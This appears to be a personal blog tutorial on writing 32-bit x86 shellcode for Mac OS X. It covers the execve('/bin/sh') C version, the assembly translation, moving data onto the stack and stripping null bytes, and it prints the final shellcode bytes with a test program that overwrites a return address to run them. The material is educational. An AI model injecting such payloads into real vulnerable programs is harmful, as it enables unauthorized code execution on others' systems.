Spawning A Shell – Mac OS X Shellcode

Continuing on my foray into the world of reverse engineering and program analysis I have spent sometime lately looking at shellcode.  For the uninitiated, shellcode refers to the small piece code used to exploit a software vulnerability – it got it’s name because it usually spawns a shell for the attacker to use.  In this post I will show you the process of creating shellcode on Mac OS X, so let’s get started!

Before you do anything you need an idea of what you want your shellcode to do.  For this post I have decided to develop the shellcode to spawn a shell in OS X.  Also worth noting is that this shellcode is written in 32-bit x86.

Step 1: Write The Corresponding C Code

When I write shellcode I like to try and write the corresponding C code first.  This may seem like a waste of time because the shellcode should be simple; however, I’ve found it acts as a guide when writing the shellcode because I can read the high-level interpretation quickly and keep track of where I am in the code.

1 #include <unistd.h>
2 #include <stdlib.h>
3
4 int main(int argc, char **argv)
5 {
6 char *execve_argv[2];
7
8 execve_argv[0] = “/bin/sh”;
9 execve_argv[1] = NULL;
10
11 execve(execve_argv[0], execve_argv, NULL);
12 exit(0);
13 }

 

There isn’t much to this program; all it does is call execve() and spawn a shell.  Note that the call to exit() isn’t strictly necessary because execve() will replace the current process image with the new one specified.  With our template code in place it is now time to convert it into assembly.

Step 2: Assembly Code

Our first version will just be a simple translation from the C code into assembly.  The only difference is that,, rather than calling the C library routines we will make direct system calls.  Due to the way Mac OS X is designed the system is vast and complicated with hundreds calls and multiple mechanisms to trap to the kernel; however, for our purpose all we need to know is that the system call number must be placed in %eax, the function arguments are pushed onto the stack in right-to-left order, and the kernel can be entered using the int $0×80 instruction.  Below is the assembly code to spawn a shell.

 

1 .text
2 .globl start
3
4 start:
5 movl    $0x3b, %eax     # SYS_execve
6
7 leal    path, %ebx      # Place address of path in %ebx
8 movl    %ebx, (args)    # Set pointer to path as first element in args
9
10 leal    args, %ecx      # Place address of args in %ecx
11
12 pushl   $0×0            # envp (null)
13 pushl   %ecx            # args
14 pushl   %ebx            # path
15
16 pushl   $0×0            # stack adjustment
17 int     $0×80           # trap
18
19 movl    $0×1, %eax      # SYS_exit
20
21 pushl   $0×0            # exit value
22
23 pushl   $0×0            # stack adjustment
24 int     $0×80           # trap
25
26 .data
27
28 path:   .asciz “/bin/sh”
29
30 args:   .word 0, 0

 

As mentioned above the system call number must be placed in %eax.  In our program this is down on line 5 for the execve() call and on line 19 for the exit() call.  You can obtain these numbers from the file /usr/include/sys/syscall.h on a machine running Mac OS X.  The next trick is to get the proper addresses for the path and argv arguments to execve(), we do this on lines 7-10.  With all of this in place all we need to do is push our arguments and trap to the kernel.  Notice that immediately before trapping we push another value onto the stack.  This is because the interrupt handler in OS X is typically called after a call which pushes the return address for that call onto the stack.  Since we aren’t performing this call we must push a value onto the stack so that our arguments are in the proper place when the interrupt is handled.  Once we finish this for execve() we simply rinse and repeat for exit().

Regarding our .data section we only need entries for our path string and the argv array.  I’ve used the .asciz directive because it saves me having to manually a null byte to our string.  To create the argv array we start by reserving two words of space in which we will copy the address of the path string into the first word and leave the second word set to null.

This code can be compiled and run as follows:

dean@BigBertha:~/shellcode $ as -arch i386 -o execve_simple.o execve_simple.s
dean@BigBertha:~/shellcode $ ld -arch i386 -o execve_simple execve_simple.o
dean@BigBertha:~/shellcode $ ./execve_simple
sh-3.2$ exit
exit
dean@BigBertha:~/shellcode $

Take note of the usage of the -arch i386 option.  This instructs the assembler and linker to use the i386 architecture (calling conventions, register names, available instructions, etc.) as opposed to the default setting on Mac OS X which 64-bit x86.

So, that’s pretty cool! We have successfully written a program in assembly that spawns a shell for us! Now, how to take this code and create proper shellcode?

Step 3: Removing The .data Section

Lets tackle the easy part first and start by removing the .data section from our program.  To do this, yet still have the data available to us, we will move our data onto the stack instead.  This can be done by first writing our string to the stack then doing a little pointer manipulation to setup the argv array.

1 .text
2 .globl start
3
4 start:
5 movl    $0x3b, %eax     # SYS_execve
6
7 pushl   $0x0068732f     # place ‘/bin/sh’ on
8 pushl   $0x6e69622f     # the stack
9 movl    %esp, %ebx      # save pointer to string
10
11 pushl   $0×0            # argv terminating null byte
12 pushl   %ebx            # pointer to path
13 movl    %esp, %ecx      # save pointer to argv
14
15 pushl   $0×0            # envp (null)
16 pushl   %ecx            # argv (on stack)
17 pushl   %ebx            # path (on stack)
18
19 pushl   $0×0            # stack adjustment
20 int     $0×80           # trap
21
22 movl    $0×01, %eax     # SYS_exit
23 pushl   $0×0            # exit return code
24 pushl   $0×0            # stack adjustment
25 int     $0×80           # trap

 

The first thing to notice is that lines 7-8 write the string ‘/bin/sh’ to the stack.  Unfortunately having the string on the stack (and out of a .data section) is only part of the game — we also need a pointer to the string in both the argv array and the first parameter to execve(). To do this, as seen in line 9, we copy the stack pointer (after pushing the string) into another register that we can use later on, effectively getting us a pointer to our string!  Lines 11-13 are similar however they setup the argv array for us instead of pushing a string.  Aside from using different registers the rest of our program is very similar to our original implementation.

Step 4: Removing Null Bytes

At this point things become a little tedious as we must remove all null bytes from our code.  The reason for this is that shellcode is frequently injected as a string so any null byte would signal the (incorrect) end of the string.

To find the null bytes what you can do is first compile the program, then use otool to look for any null bytes in the .text section.  For example, we get the following with our previous code sample.

dean@BigBertha:~/shellcode $ otool -t execve_no_data
execve_no_data:
(__TEXT,__text) section
00001f84 b8 3b 00 00 00 68 2f 73 68 00 68 2f 62 69 6e 89
00001f94 e3 6a 00 53 89 e1 6a 00 51 53 6a 00 cd 80 b8 01
00001fa4 00 00 00 6a 00 6a 00 cd 80

Here we see that there are three consecutive null bytes beginning at the address 0x1f86 which correspond to the move of line 5 in our last code sample.  To get rid of these null bytes we can begin by clearing $eax to 0 using XOR and then copying 0x3b into the low byte of the register (lines 14-15 below).  Rather than going through each null byte I’ll leave that as a bit of fun for you :)  Once you’ve made all the changes you should end up with code that looks something like the following program.

1 /* Shellcode to spawn a shell on OS X.  We can’t use the ‘traditional’
* technique of addressing relative to a call site in the .text because
* OS X is smart enough to know that it should not allow code to be modified
* in that section.
*
* Our new technique is to place all the data on the stack and manipulate it
* there then simply reading from the stack.
*/
9
10 .text
11 .globl start
12
13 start:
14 xorl    %eax, %eax      # clear %eax
15 movb    $0x3b, %al      # SYS_execve
16
17 xorl    %edx, %edx
18 movl    $0x68732f01, %edx
19 shrl    $0×08, %edx
20
21 pushl   %edx
22 pushl   $0x6e69622f
23 movl    %esp, %ebx
24
25 xorl    %edx, %edx
26
27 pushl   %edx
28 pushl   %ebx
29 movl    %esp, %ecx
30
31 pushl   %edx            # envp (null)
32 pushl   %ecx            # argv (on stack)
33 pushl   %ebx            # path (on stack)
34
35 pushl   %edx
36 int     $0×80
37
38 movb    $0×01, %al      # SYS_exit
39 pushl   %edx            # exit return code
40 pushl   %edx            # stack adjustment
41 int     $0×80

 

As usual you can compile and test this to make sure it still works as intended.

Step 5: Testing Our Code

For this last part we want to see our code in action, being executed on the stack of a simple program.  Our test program is as follows:

1   #include <stdlib.h>

2

3   char *sc = “\x31\xc0\xb0\x3b\x31\xd2\xba\x01\x2f\x73\x68\xc1\xea\x08\x52\x68″

4              “\x2f\x62\x69\x6e\x89\xe3\x31\xd2\x52\x53\x89\xe1\x52\x51\x53\x52″

5              “\xcd\x80\xb0\x01\x52\x52\xcd\x80″;

6

7   int main(int argc, char **argv)

8   {

9     int *mret;

10    mret = (int *)&mret + atoi(argv[1]);

11    *mret = (int)sc;

12  }

 

Lines 3-5 of this code contains our shellcode, it’s just written in hex rather than human-readable mnemonics.  The rest of program just creates a variable on the stack, gets the address of that variable, adds it with a supplied offset, and then copies the address of our shellcode into (hopefully) the location typically used to store the return address.  By placing the address of our shellcode here upon return of main() our code should be executed and resulting in a shell being spawned.

Comments are closed.